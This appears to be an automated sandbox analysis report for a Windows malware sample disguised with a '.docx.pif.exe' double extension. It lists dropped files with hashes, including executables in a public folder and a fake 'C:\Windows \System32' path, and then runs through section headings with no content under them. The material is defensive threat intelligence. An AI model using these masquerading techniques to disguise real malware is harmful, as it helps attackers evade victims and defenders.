C:\Users\Public\alpha.exe	PE32+ executable (console) x86-64, for MS Windows	8A2122E8162DBEF04694B9C3E0B6CDEE	F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D	B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
C:\Users\Public\ger.exe	PE32+ executable (console) x86-64, for MS Windows	227F63E1D9008B36BDBCC4B397780BE4	C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE	C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
C:\Users\Public\xkn.exe	PE32+ executable (console) x86-64, for MS Windows	04029E121A0CFA5991749937DD22A1D9	F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054	9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log	CSV text	A477C52686412872F51E6EADC0EE00E8	97AF03D2CD45488E73DCB72720F6EB704DB687B6	9478FEA68BD400729D6132BC0D47527BE473E45F64C17C4568F655C188EA3C6A
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	1868BD5DBAA1C3487BECA84BADCA4326	CE9229CBD2D84DB536C9BF4CC56A7765433AA956	014955686776BC8F3512DD1E80A35170C73556A679B8AC33567FEAEB5D11AC70
C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat	ASCII text, with very long lines (324), with CRLF line terminators	E62F427202D3E5A3BA60EBE78567918C	6EF0CD5BA6C871815FCEB27FF095A7931452B334	06BEE225A830EA0E67B91FD7D24280C5315EF82049B25B07C9CFDE4E36A639FF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ieogscvd.21l.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txw30cbq.i2f.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Windows \System32\per.exe	PE32+ executable (GUI) x86-64, for MS Windows	85018BE1FD913656BC9FF541F017EACD	26D7407931B713E0F0FA8B872FEECDB3CF49065A	C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
\Device\Null	ASCII text, with CRLF, CR line terminators	13015015DD907D28996153DF14881252	532C595BAAE0A027D02D1B28D7B83D57350A310E	4499283166530CE395CBC12677FEF2BD52759EACDCC5BDDE56C039B1A2E99C0B

Windows Analysis Report #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Malware Threat Intel
Provided by